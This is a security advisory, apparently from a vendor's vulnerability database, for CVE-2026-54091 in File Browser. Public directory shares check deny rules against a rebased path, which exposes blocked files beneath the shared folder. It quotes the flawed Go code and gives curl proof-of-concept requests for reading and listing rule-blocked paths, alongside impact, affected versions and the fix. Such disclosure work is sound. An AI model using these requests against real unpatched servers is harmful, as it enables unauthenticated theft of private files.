Summary
File Browser's public share handlers rebase the share owner's filesystem root to the shared directory and then evaluate descendant paths against the owner's global and per-user rules using the rebased relative path instead of the original path relative to the owner's scope.
As a result, an attacker who knows a public directory share URL can access files and subdirectories that the owner explicitly blocked with rules, as long as those blocked paths are located underneath the shared directory. In the simplest case this is an unauthenticated information disclosure through GET /api/public/share/* and GET /api/public/dl/*.
Details
The public share flow first resolves the original shared path under the owner's filesystem, but then switches d.user.Fs to a new BasePathFs rooted at the shared directory. The follow-up authorization check is still performed by d.Check, which compares the request path to rule strings using prefix matching.
When the share target is a directory, the path passed to d.Check becomes relative to the shared directory, while the rules remain relative to the owner's original scope. A deny rule such as /projects/private therefore no longer matches a public share request for /private/secret.txt, even though the rebased filesystem resolves that request to the real path /projects/private/secret.txt.
Core vulnerable code path:
// http/public.go
if file.IsDir {
basePath = filepath.Clean(link.Path)
filePath = ifPath
}
d.user.Fs = afero.NewBasePathFs(d.user.Fs, basePath)
file, err = files.NewFileInfo(&files.FileOptions{
Fs: d.user.Fs,
Path: filePath,
Expand: true,
Checker: d,
})
// http/data.go and rules/rules.go
func (d *data) Check(path string) bool {
allow := true
for _, rule := range d.settings.Rules {
if rule.Matches(path) {
allow = rule.Allow
}
}
for _, rule := range d.user.Rules {
if rule.Matches(path) {
allow = rule.Allow
}
}
return allow
}
func (r *Rule) Matches(path string) bool {
if path == r.Path {
return true
}
prefix := r.Path
if prefix != "/" && !strings.HasSuffix(prefix, "/") {
prefix += "/"
}
return strings.HasPrefix(path, prefix)
}
The issue is reachable from the public endpoints registered in http/http.go for /api/public/share/* and /api/public/dl/*.
PoC
The attacker only needs a directory share URL. No authenticated session is required if the share is not password protected.
Reproduction flow:
- Prepare a directory owned by a normal user, for example
/projects/. - Inside it, create a sensitive child path such as
/projects/private/secret.txt. - Configure a deny rule for the share owner that blocks
/projects/private. - Have the owner create a public share for
/projects/. - Request the blocked child path through the public share endpoints.
PoC:
# owner creates a public share for /projects/
curl -s -X POST 'http://HOST/api/share/projects/' \
-H 'X-Auth: <OWNER_JWT>' \
-H 'Content-Type: application/json' \
-d '{}'
The response contains a share hash such as:
{"hash":"<HASH>","path":"/projects/","userID":2,"expire":0}
The attacker can then access a rule-blocked file below the shared directory:
curl -i 'http://HOST/api/public/dl/<HASH>/private/secret.txt'
A blocked subdirectory can also be listed directly:
curl -i 'http://HOST/api/public/share/<HASH>/private/'
the server returns 200 OK and serves the file content or directory listing, even though the share owner's rules should have made that path inaccessible.
Impact
This flaw allows public share recipients to read files and browse directories that the share owner explicitly intended to block with File Browser rules. Because the vulnerable path is the public share feature, the exposure can be unauthenticated and internet-reachable whenever a share link is exposed.
In practical deployments, this can disclose secrets, configuration files, backup material, private project directories, or any other content that administrators or users attempted to hide beneath a shared parent directory using the built-in rule system.
The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions. Typical impact: unauthorized data access or execution of privileged operations.
CVE-2026-54091 has a CVSS score of 7.5 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.63.6); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-54091? CVE-2026-54091 is a high-severity incorrect authorization vulnerability in github.com/filebrowser/filebrowser/v2 (go), affecting versions <= 2.63.5. It is fixed in 2.63.6. The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions.
- How severe is CVE-2026-54091? CVE-2026-54091 has a CVSS score of 7.5 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which packages are affected by CVE-2026-54091?
github.com/filebrowser/filebrowser/v2(go) (versions <= 2.63.5)github.com/filebrowser/filebrowser(go) (versions <= 1.11.0)
- Is there a fix for CVE-2026-54091? Yes. CVE-2026-54091 is fixed in 2.63.6. Upgrade to this version or later.
- Is CVE-2026-54091 exploitable, and should I be worried? Whether CVE-2026-54091 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-54091 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-54091? Upgrade
github.com/filebrowser/filebrowser/v2to 2.63.6 or later.